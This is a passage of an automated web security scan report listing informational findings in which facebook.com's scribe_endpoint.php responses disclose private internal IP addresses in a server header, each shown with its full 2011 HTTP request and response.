Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

HTTP/1.1 200 OK
Content-Length: 67
Content-Type: image/png
X-FB-Server: 10.54.238.61
X-Cnection: close
Date: Thu, 16 Jun 2011 12:25:33 GMT

.PNG
.
...IHDR....................
IDATx.c.......
-.....IEND.B`.

19.584. http://www.facebook.com/common/scribe_endpoint.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/common/scribe_endpoint.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.62.51.58

Request

GET /common/scribe_endpoint.php?c=v6check&m=%7B%22address%22%3A%22173.193.214.243%22%2C%22version%22%3A4%2C%22variant%22%3Anull%2C%22w%22%3A%7B%22check4%22%3A0%2C%22check6%22%3A0%7D%2C%22to%22%3Afalse%2C%22elapsed%22%3A323%2C%22baseline_elapsed%22%3A322%7D&asyncSignal=7710 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/plugins/like.php?action=recommend&api_key=your%20app%20id&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df1f7e8e9fc%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ff34167b284%26relation%3Dparent.parent%26transport%3Dpostmessage&font=arial&href=http%3A%2F%2Fwww.cnbc.com%2Fid%2F43422860&layout=button_count&locale=en_US&node_type=link&sdk=joey&show_faces=false&width=130
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

HTTP/1.1 200 OK
Content-Length: 67
Content-Type: image/png
X-FB-Server: 10.62.51.58
X-Cnection: close
Date: Thu, 16 Jun 2011 14:03:45 GMT

.PNG
.
...IHDR....................
IDATx.c.......
-.....IEND.B`.

19.585. http://www.facebook.com/common/scribe_endpoint.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/common/scribe_endpoint.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.43.68.69

Request

GET /common/scribe_endpoint.php?c=v6check&m=%7B%22address%22%3A%22173.193.214.243%22%2C%22version%22%3A4%2C%22variant%22%3Anull%2C%22w%22%3A%7B%22check4%22%3A0%2C%22check6%22%3A0%7D%2C%22to%22%3Afalse%2C%22elapsed%22%3A1320%2C%22baseline_elapsed%22%3A1319%7D&asyncSignal=9434 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/plugins/like.php?action=recommend&api_key=your%20app%20id&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df14e6879a%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ff17b9d8228%26relation%3Dparent.parent%26transport%3Dpostmessage&font=arial&href=http%3A%2F%2Fwww.cnbc.com%2Fid%2F43422860&layout=button_count&locale=en_US&node_type=link&sdk=joey&show_faces=false&width=130
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

HTTP/1.1 200 OK
Content-Length: 67
Content-Type: image/png
X-FB-Server: 10.43.68.69
X-Cnection: close
Date: Thu, 16 Jun 2011 15:47:02 GMT

.PNG
.
...IHDR....................
IDATx.c.......
-.....IEND.B`.

19.586. http://www.facebook.com/common/scribe_endpoint.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/common/scribe_endpoint.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.54.123.35

Request

GET /common/scribe_endpoint.php?c=v6check&m=%7B%22address%22%3A%22173.193.214.243%22%2C%22version%22%3A4%2C%22variant%22%3Anull%2C%22w%22%3A%7B%22check6%22%3A0%2C%22check4%22%3A0%7D%2C%22to%22%3Afalse%2C%22elapsed%22%3A1408%2C%22baseline_elapsed%22%3A1408%7D&asyncSignal=4995 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/plugins/like.php?action=recommend&api_key=your%20app%20id&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df35ef54634%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ff589430f%26relation%3Dparent.parent%26transport%3Dpostmessage&font=arial&href=http%3A%2F%2Fwww.cnbc.com%2Fid%2F43422860&layout=button_count&locale=en_US&node_type=link&sdk=joey&show_faces=false&width=130
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

HTTP/1.1 200 OK
Content-Length: 67
Content-Type: image/png
X-FB-Server: 10.54.123.35
X-Cnection: close
Date: Thu, 16 Jun 2011 16:12:53 GMT

.PNG
.
...IHDR....................
IDATx.c.......
-.....IEND.B`.

19.587. http://www.facebook.com/common/scribe_endpoint.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/common/scribe_endpoint.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.55.6.46

Request

GET /common/scribe_endpoint.php?c=v6check&m=%7B%22address%22%3A%22173.193.214.243%22%2C%22version%22%3A4%2C%22variant%22%3Anull%2C%22w%22%3A%7B%22check6%22%3A0%2C%22check4%22%3A0%7D%2C%22to%22%3Afalse%2C%22elapsed%22%3A1553%2C%22baseline_elapsed%22%3A1553%7D&asyncSignal=1955 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/plugins/recommendations.php?site=cnbc.com&width=350&height=350&header=true&colorscheme=light&font=arial
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

HTTP/1.1 200 OK
Content-Length: 67
Content-Type: image/png
X-FB-Server: 10.55.6.46
X-Cnection: close
Date: Thu, 16 Jun 2011 16:38:44 GMT

.PNG
.
...IHDR....................
IDATx.c.......
-.....IEND.B`.

19.588. http://www.facebook.com/common/scribe_endpoint.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/common/scribe_endpoint.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.62.161.50

Request

GET /common/scribe_endpoint.php?c=v6check&m=%7B%22address%22%3A%22173.193.214.243%22%2C%22version%22%3A4%2C%22variant%22%3Anull%2C%22w%22%3A%7B%22check6%22%3A0%2C%22check4%22%3A0%7D%2C%22to%22%3Afalse%2C%22elapsed%22%3A1056%2C%22baseline_elapsed%22%3A1056%7D&asyncSignal=1813 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/plugins/like.php?action=recommend&api_key=your%20app%20id&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df343fad964%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ffac3ba548%26relation%3Dparent.parent%26transport%3Dpostmessage&font=arial&href=http%3A%2F%2Fwww.cnbc.com%2Fid%2F43422860&layout=button_count&locale=en_US&node_type=link&sdk=joey&show_faces=false&width=130
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

HTTP/1.1 200 OK
Content-Length: 67
Content-Type: image/png
X-FB-Server: 10.62.161.50
X-Cnection: close
Date: Thu, 16 Jun 2011 17:09:51 GMT

.PNG
.
...IHDR....................
IDATx.c.......
-.....IEND.B`.

19.589. http://www.facebook.com/common/scribe_endpoint.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/common/scribe_endpoint.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.32.136.118

Request

GET /common/scribe_endpoint.php?c=v6check&m=%7B%22address%22%3A%22173.193.214.243%22%2C%22version%22%3A4%2C%22variant%22%3Anull%2C%22w%22%3A%7B%22check6%22%3A0%2C%22check4%22%3A0%7D%2C%22to%22%3Afalse%2C%22elapsed%22%3A2046%2C%22baseline_elapsed%22%3A2682%7D&asyncSignal=7873 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/plugins/like.php?action=recommend&api_key=your%20app%20id&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df31f6560a%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ff3fbe1cebc%26relation%3Dparent.parent%26transport%3Dpostmessage&font=arial&href=http%3A%2F%2Fwww.cnbc.com%2Fid%2F43422860&layout=button_count&locale=en_US&node_type=link&sdk=joey&show_faces=false&width=130
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

HTTP/1.1 200 OK
Content-Length: 67
Content-Type: image/png
X-FB-Server: 10.32.136.118
Connection: close
Date: Thu, 16 Jun 2011 17:56:25 GMT

.PNG
.
...IHDR....................
IDATx.c.......
-.....IEND.B`.

19.590. http://www.facebook.com/common/scribe_endpoint.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/common/scribe_endpoint.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.62.69.40

Request

GET /common/scribe_endpoint.php?c=v6check&m=%7B%22address%22%3A%22173.193.214.243%22%2C%22version%22%3A4%2C%22variant%22%3Anull%2C%22w%22%3A%7B%22check6%22%3A0%2C%22check4%22%3A0%7D%2C%22to%22%3Afalse%2C%22elapsed%22%3A174%2C%22baseline_elapsed%22%3A1220%7D&asyncSignal=536 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/plugins/like.php?action=recommend&api_key=your%20app%20id&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df1a26fe16%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ff25942f924%26relation%3Dparent.parent%26transport%3Dpostmessage&font=arial&href=http%3A%2F%2Fwww.cnbc.com%2Fid%2F43422860&layout=button_count&locale=en_US&node_type=link&sdk=joey&show_faces=false&width=130
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

HTTP/1.1 200 OK
Content-Length: 67
Content-Type: image/png
X-FB-Server: 10.62.69.40
X-Cnection: close
Date: Thu, 16 Jun 2011 16:54:15 GMT

.PNG
.
...IHDR....................
IDATx.c.......
-.....IEND.B`.

19.591. http://www.facebook.com/common/scribe_endpoint.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/common/scribe_endpoint.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.27.87.122

Request

GET /common/scribe_endpoint.php?c=v6check&m=%7B%22address%22%3A%22173.193.214.243%22%2C%22version%22%3A4%2C%22variant%22%3Anull%2C%22w%22%3A%7B%22check6%22%3A0%2C%22check4%22%3A0%7D%2C%22to%22%3Afalse%2C%22elapsed%22%3A1205%2C%22baseline_elapsed%22%3A1205%7D&asyncSignal=9624 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/plugins/like.php?action=recommend&api_key=your%20app%20id&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Dfce684c48%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ff99472368%26relation%3Dparent.parent%26transport%3Dpostmessage&font=arial&href=http%3A%2F%2Fwww.cnbc.com%2Fid%2F43422860&layout=button_count&locale=en_US&node_type=link&sdk=joey&show_faces=false&width=130
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

HTTP/1.1 200 OK
Content-Length: 67
Content-Type: image/png
X-FB-Server: 10.27.87.122
X-Cnection: close
Date: Thu, 16 Jun 2011 13:53:25 GMT

.PNG
.
...IHDR....................
IDATx.c.......
-.....IEND.B`.

19.592. http://www.facebook.com/common/scribe_endpoint.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/common/scribe_endpoint.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.54.155.38

Request

GET /common/scribe_endpoint.php?c=v6check&m=%7B%22address%22%3A%22173.193.214.243%22%2C%22version%22%3A4%2C%22variant%22%3Anull%2C%22w%22%3A%7B%22check6%22%3A0%2C%22check4%22%3A0%7D%2C%22to%22%3Afalse%2C%22elapsed%22%3A1367%2C%22baseline_elapsed%22%3A1367%7D&asyncSignal=4984 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/plugins/like.php?action=recommend&api_key=your%20app%20id&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df1a6f47958%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ff321cafa4%26relation%3Dparent.parent%26transport%3Dpostmessage&font=arial&href=http%3A%2F%2Fwww.cnbc.com%2Fid%2F43422860&layout=button_count&locale=en_US&node_type=link&sdk=joey&show_faces=false&width=130
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

HTTP/1.1 200 OK
Content-Length: 67
Content-Type: image/png
X-FB-Server: 10.54.155.38
X-Cnection: close
Date: Thu, 16 Jun 2011 17:35:40 GMT

.PNG
.
...IHDR....................
IDATx.c.......
-.....IEND.B`.

19.593. http://www.facebook.com/common/scribe_endpoint.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/common/scribe_endpoint.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.62.150.63

Request

GET /common/scribe_endpoint.php?c=v6check&m=%7B%22address%22%3A%22173.193.214.243%22%2C%22version%22%3A4%2C%22variant%22%3Anull%2C%22w%22%3A%7B%22check6%22%3A0%2C%22check4%22%3A0%7D%2C%22to%22%3Afalse%2C%22elapsed%22%3A1682%2C%22baseline_elapsed%22%3A1682%7D&asyncSignal=5565 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/plugins/like.php?action=recommend&api_key=your%20app%20id&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df13c827958%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ffee63f02c%26relation%3Dparent.parent%26transport%3Dpostmessage&font=arial&href=http%3A%2F%2Fwww.cnbc.com%2Fid%2F43422860&layout=button_count&locale=en_US&node_type=link&sdk=joey&show_faces=false&width=130
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

HTTP/1.1 200 OK
Content-Length: 67
Content-Type: image/png
X-FB-Server: 10.62.150.63
X-Cnection: close
Date: Thu, 16 Jun 2011 17:04:39 GMT

.PNG
.
...IHDR....................
IDATx.c.......
-.....IEND.B`.

19.594. http://www.facebook.com/common/scribe_endpoint.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/common/scribe_endpoint.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.32.155.132

Request

GET /common/scribe_endpoint.php?c=v6check&m=%7B%22address%22%3A%22173.193.214.243%22%2C%22version%22%3A4%2C%22variant%22%3Anull%2C%22w%22%3A%7B%22check4%22%3A0%2C%22check6%22%3A0%7D%2C%22to%22%3Afalse%2C%22elapsed%22%3A1510%2C%22baseline_elapsed%22%3A1510%7D&asyncSignal=1260 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/plugins/recommendations.php?site=cnbc.com&width=350&height=350&header=true&colorscheme=light&font=arial
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

HTTP/1.1 200 OK
Content-Length: 67
Content-Type: image/png
X-FB-Server: 10.32.155.132
Connection: close
Date: Thu, 16 Jun 2011 17:56:17 GMT

.PNG
.
...IHDR....................
IDATx.c.......
-.....IEND.B`.

19.595. http://www.facebook.com/common/scribe_endpoint.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/common/scribe_endpoint.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.63.7.32

Request

GET /common/scribe_endpoint.php?c=v6check&m=%7B%22address%22%3A%22173.193.214.243%22%2C%22version%22%3A4%2C%22variant%22%3Anull%2C%22w%22%3A%7B%22check6%22%3A0%2C%22check4%22%3A0%7D%2C%22to%22%3Afalse%2C%22elapsed%22%3A1082%2C%22baseline_elapsed%22%3A1204%7D&asyncSignal=5684 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/plugins/like.php?action=recommend&api_key=your%20app%20id&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df1f82028f4%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ff3774078cc%26relation%3Dparent.parent%26transport%3Dpostmessage&font=arial&href=http%3A%2F%2Fwww.cnbc.com%2Fid%2F43422860&layout=button_count&locale=en_US&node_type=link&sdk=joey&show_faces=false&width=130
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

HTTP/1.1 200 OK
Content-Length: 67
Content-Type: image/png
X-FB-Server: 10.63.7.32
X-Cnection: close
Date: Thu, 16 Jun 2011 17:46:01 GMT

.PNG
.
...IHDR....................
IDATx.c.......
-.....IEND.B`.

19.596. http://www.facebook.com/common/scribe_endpoint.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/common/scribe_endpoint.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.54.206.47

Request

GET /common/scribe_endpoint.php?c=v6check&m=%7B%22address%22%3A%22173.193.214.243%22%2C%22version%22%3A4%2C%22variant%22%3Anull%2C%22w%22%3A%7B%22check6%22%3A0%2C%22check4%22%3A0%7D%2C%22to%22%3Afalse%2C%22elapsed%22%3A1380%2C%22baseline_elapsed%22%3A1380%7D&asyncSignal=7750 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/plugins/like.php?action=recommend&api_key=your%20app%20id&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df29b2230e8%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ffbe2c2ba%26relation%3Dparent.parent%26transport%3Dpostmessage&font=arial&href=http%3A%2F%2Fwww.cnbc.com%2Fid%2F43422860&layout=button_count&locale=en_US&node_type=link&sdk=joey&show_faces=false&width=130
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

HTTP/1.1 200 OK
Content-Length: 67
Content-Type: image/png
X-FB-Server: 10.54.206.47
X-Cnection: close
Date: Thu, 16 Jun 2011 13:37:55 GMT

.PNG
.
...IHDR....................
IDATx.c.......
-.....IEND.B`.

19.597. http://www.facebook.com/common/scribe_endpoint.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/common/scribe_endpoint.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.32.174.106

Request

GET /common/scribe_endpoint.php?c=v6check&m=%7B%22address%22%3A%22173.193.214.243%22%2C%22version%22%3A4%2C%22variant%22%3Anull%2C%22w%22%3A%7B%22check6%22%3A0%2C%22check4%22%3A0%7D%2C%22to%22%3Afalse%2C%22elapsed%22%3A1179%2C%22baseline_elapsed%22%3A1499%7D&asyncSignal=987 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/plugins/like.php?action=recommend&api_key=your%20app%20id&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df1d27b033%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ffc3d649fc%26relation%3Dparent.parent%26transport%3Dpostmessage&font=arial&href=http%3A%2F%2Fwww.cnbc.com%2Fid%2F43422860&layout=button_count&locale=en_US&node_type=link&sdk=joey&show_faces=false&width=130
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

HTTP/1.1 200 OK
Content-Length: 67
Content-Type: image/png
X-FB-Server: 10.32.174.106
X-Cnection: close
Date: Thu, 16 Jun 2011 13:12:11 GMT

.PNG
.
...IHDR....................
IDATx.c.......
-.....IEND.B`.

19.598. http://www.facebook.com/common/scribe_endpoint.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/common/scribe_endpoint.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.27.194.127

Request

GET /common/scribe_endpoint.php?c=v6check&m=%7B%22address%22%3A%22173.193.214.243%22%2C%22version%22%3A4%2C%22variant%22%3Anull%2C%22w%22%3A%7B%22check6%22%3A0%2C%22check4%22%3A0%7D%2C%22to%22%3Afalse%2C%22elapsed%22%3A1741%2C%22baseline_elapsed%22%3A1741%7D&asyncSignal=8671 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/plugins/recommendations.php?site=cnbc.com&width=350&height=350&header=true&colorscheme=light&font=arial
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

HTTP/1.1 200 OK
Content-Length: 67
Content-Type: image/png
X-FB-Server: 10.27.194.127
X-Cnection: close
Date: Thu, 16 Jun 2011 17:25:18 GMT

.PNG
.
...IHDR....................
IDATx.c.......
-.....IEND.B`.

19.599. http://www.facebook.com/common/scribe_endpoint.php previous next

Summary

Severity:	Information
Confidence:	Certain
